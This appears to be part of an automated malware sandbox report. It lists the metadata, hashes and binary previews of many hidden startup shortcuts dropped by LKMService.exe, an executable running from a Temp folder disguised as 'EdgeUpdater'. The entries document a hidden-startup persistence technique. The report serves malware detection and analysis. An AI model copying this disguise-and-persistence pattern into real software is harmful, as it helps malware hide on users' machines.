Preview:	L..................F....".....X:3.....!H3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_111bb590f9e24471b247ca4b4d7fd194.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:54 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.932768135121045
Encrypted:	false
SSDEEP:	24:8kRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8mJD3lfAvRAt41vgHyg
MD5:	BA201631B8037E8817EEE33C6C1CBA5E
SHA1:	CADF4B9A6EEDB1AE29B06CF0C625A811095102BD
SHA-256:	0CEFC4D3CB4B599DBFA753621DFFBFFF8B2F9700CB99FB10D8E5AF5E77123E45
SHA-512:	064D43516D782F84D178F9C63FE5472027C2F07D22F5A6185CECD14DF35D19F9465C19DC3C7D753884D8A9F136908C9449E1E9F37E85D4471D22B961546857C3
Malicious:	false
Preview:	L..................F....".....X:3...r.T3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1260347513fa42eb8dbca954b1f9766f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:26 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938805545238883
Encrypted:	false
SSDEEP:	24:8dRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TJD3lfAvRAt41vgHyg
MD5:	2A19CF8A5B62A535E8EFBB94261A63DA
SHA1:	F13DCE1274BEB202BC3D04ADDD536A520D81A2D4
SHA-256:	1C3BAA497A9D79E422EDEF20ECBCC79063DC0DF713E572AA858EF50A6532E044
SHA-512:	F8213EAC61FCF8EF2E81B743B53591A16C450E3B4560F5FD7820CBE68E3919AA877BADDBD99F5960109BEF0D37745148B2098C1E1BD8DB232C9529E3E3313366
Malicious:	false
Preview:	L..................F....".....X:3...5.)D3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17b0682e31094ae8b61542e0fc483319.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:52 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.933044243616138
Encrypted:	false
SSDEEP:	24:8zRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8VJD3lfAvRAt41vgHyg
MD5:	00C4DA46A8A67715900EB05D0795A74D
SHA1:	37E8BCE7230635F16BD83B3DC62C5152F576A5BE
SHA-256:	E3566090D6E60322E022425EACB5899C1A3480765716DD4E67B9192817F4AF4B
SHA-512:	48CC18645ED24400D8E34AFA5391AB2DBAD36E4E21BDCA8B2C6241FED41EAF3BC280D879971EDD26066C54DC5C4122B0B12A3F4F12DFDC4E216556FA208068DE
Malicious:	false
Preview:	L..................F....".....X:3....:kS3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1bc86309aad64beaaba50da47f1fe248.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9361445524285035
Encrypted:	false
SSDEEP:	24:8yRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:80JD3lfAvRAt41vgHyg
MD5:	0C1415ED3AD4436D6F0C41EE3E49BF9C
SHA1:	0DC05FCFC4332F98C01CBAF5D58D8C8A9AC2C059
SHA-256:	14BE9C4CDF3EA641D823FD97CB67A5FD2A1D22B3AE2DCFAB3E2723797A09D78A
SHA-512:	859F58E32295B27CF8F16484010F88BCA664F85C06B9A430F4CC9DD4AABEB63F4898C223BD3948E3CB7761E4F27865898737C61A9729B4557AE776F1AC2F485D
Malicious:	false
Preview:	L..................F....".....X:3...DX.;3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_255ec7c5f6124168899ab52eb1fb3db9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:56 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.935989893915646
Encrypted:	false
SSDEEP:	24:8SVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8kJD3lfAvRAt41vgHyg
MD5:	93CC64C9BD3BABCECED57BAD5CF09A49
SHA1:	51DF500AC875C6149E3BDED0CBA8F20A530AEC9D
SHA-256:	BE5364CA30EBE7FB1A330A530305F0BAFCC918EBDCDAF5EE748451F4052AEE2C
SHA-512:	8B1D70B3C0F460CD1F26B95E902E0677B71F49166F7CFEC52E4873083B30D3F5B8CC28D0028EEB141C3E25E37D163B71FB10687F743B14B53C874485F4F96DDB
Malicious:	false
Preview:	L..................F....".....X:3....C.U3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_270b1265d8e74892bac3d731d24190c0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:15 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939044252292188
Encrypted:	false
SSDEEP:	24:8SARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8rJD3lfAvRAt41vgHyg
MD5:	AB1112D9456D869D7232E5D8F8D2325F
SHA1:	5B6A82202330036F0EDDB696B33AB9AE298A17C8
SHA-256:	400AE984ABF7D50E9C672ABAEE1C099E4A4BB1EEC3F3AA3A3BBCA998A8FA42F3
SHA-512:	D8542A08C22AEC1E0B3DD938D470594E843A56ADF63EB3D50FB0D25C8B17099452E2717F7E0B5AF8AC106539D89B41A9D2679DD49A0650EA0957293D6B9BDC5D
Malicious:	false
Preview:	L..................F....".....X:3...v..`3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_284cd24aa4e1493cb8422375a300e535.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:17 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.943375268308793
Encrypted:	false
SSDEEP:	24:8rRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8dJD3lfAvRAt41vgHyg
MD5:	CC249D0CDDF94C0D181BB0236C0CA40E
SHA1:	611D66FA3BA836AB5A68A059239D63D0F7BC7B76
SHA-256:	7CA61E7D219E1B280218EB48CC8CD368E5AFCDAFF27F5BD36BD72E9E70D7471A
SHA-512:	07C5FDFD51A29E7137AFE0E9BE8EF07E2F2599050D05037F518D0A36FABB2EEDD8B37F8481EF5EB84DCE4E79102CD5C580707F42CC23643432C6A2685CE132C2
Malicious:	false
Preview:	L..................F....".....X:3....;Ab3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_28a5b517ff724da4be16ea4aaf5a357c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:40 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937929191810866
Encrypted:	false
SSDEEP:	24:8KRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8cJD3lfAvRAt41vgHyg
MD5:	421108D2B9B6C809ACEAFF0804CD9EE1
SHA1:	E108D768F6062F2FFD2CEFC19B9F23E6C7FDD510
SHA-256:	35D96769A67F1036CEEDFF9D03ED07E2EC8AFBCFFD9880948E7ECE43BD71863E
SHA-512:	ABB2AC017BC8193E5DBECFE0ADD85625E1707718F9A00146C66086801DED589F8FB158294688795B1F4425991E66CC855DDB1572017FA7AE0BD4F6082F9FC6C0
Malicious:	false
Preview:	L..................F....".....X:3...jv.L3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d07a0547ac04ab9af7372ee910ba6b1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:47 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.936641261574785
Encrypted:	false
SSDEEP:	24:85RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nJD3lfAvRAt41vgHyg
MD5:	DEDCDD88390B5893F0A7FEAE0E40FCCE
SHA1:	28B3C902523B53823DCBAD075DB9E881615320E2
SHA-256:	9387B9A9627129A56EFB57BF9F7884597C2C4D10BBBACF2DE77EE377CE72F8AF
SHA-512:	3EB7D8620AC5D33AB6969EB2ABD1BC2304EA50B567B62A1F5D310E5F0C70ADFE61D7905AE7F1A15471429B2BD0EA4E29908DA3E1E0DF030464A8042C565972CC
Malicious:	false
Preview:	L..................F....".....X:3.....BP3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d708224935546eb848b785f0206ad51.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:14 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.936809385261839
Encrypted:	false
SSDEEP:	24:8zyRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8gJD3lfAvRAt41vgHyg
MD5:	6B0E7F9A3E07FA41C6BA6E7DC97833FE
SHA1:	E91737FB02918232B5213EF69C0B1E483155BEA9
SHA-256:	2C78505615C335FEB6C57DE27F4870054A08833F453515D5861EFFCE19FB3046
SHA-512:	729796654FB9C0A31202D86D578EEC301C0BA6B99B7B17A095977DDCDC43FC612D3BB40797C5060BFFE6538CE29F46B4A0024B58E304AD6927C01B04C12213D2
Malicious:	false
Preview:	L..................F....".....X:3...?._`3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_30649bb19ccb493bae273224706f8bba.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:27 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9328567852734055
Encrypted:	false
SSDEEP:	24:8sRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:86JD3lfAvRAt41vgHyg
MD5:	B9ABD2EB90D9300A2B0C4C26FB7EF557
SHA1:	C49EB3A923F99C64806AC64BF6417B14ED0CA831
SHA-256:	316D4EF100DB473DB0E39C5F125C784B970223232526772A0748153EAFBC6807
SHA-512:	11CE93694D578DD9FCB014C68B9D3F6930427A529721C1A72AF6F729CD2929A51EB09CA619C570F828878047D70F8E80DA7B4DF40BC463E16AD273CCF440BA21
Malicious:	false
Preview:	L..................F....".....X:3...e..D3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3334419e53b3488ca85ae4de076f47dc.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:23 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.93504182173481
Encrypted:	false
SSDEEP:	24:8N8WERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nCJD3lfAvRAt41vgHyg
MD5:	5FB346F6183BE86EA4A0B43379CC6370
SHA1:	8891989AFD013DBF22EB77372816C4624B34B102
SHA-256:	86842654D6A509FCC99151FC1017B8842A78AED4B9BF1D45D4B37F8303174868
SHA-512:	FA34538BF1826BD373C459C3FE5E4F7CC0A6D154CCBD9CB11C9BC7E873A28649473859EF6AF00F31DC8A65F92B71FFACB01D6B1F4E6C44E89EB13F472D60F726
Malicious:	false
Preview:	L..................F....".....X:3...s.lB3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_385556207e4d49bb88bb33a72ac98a68.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:14 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937570052019027
Encrypted:	false
SSDEEP:	24:8VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8bJD3lfAvRAt41vgHyg
MD5:	0B86BCCEA21A33A3B145D5A9F0061874
SHA1:	9F74CA5DA1F834458B00D2699F961B9D409654A4
SHA-256:	B5840DFBC433E0DAB35E3CD6A8F04DB4CFA7FF21DFED99A105AA7DF9A608B21B
SHA-512:	921C5EEA35C05676C5F89E18230E3DF61CD8CD0A70AC50A1980EEB61CA4A5D6E2A82D700D99D756DC343B59641711E7E901D3E5612DBABD4EE4C0C97C5DB872E
Malicious:	false
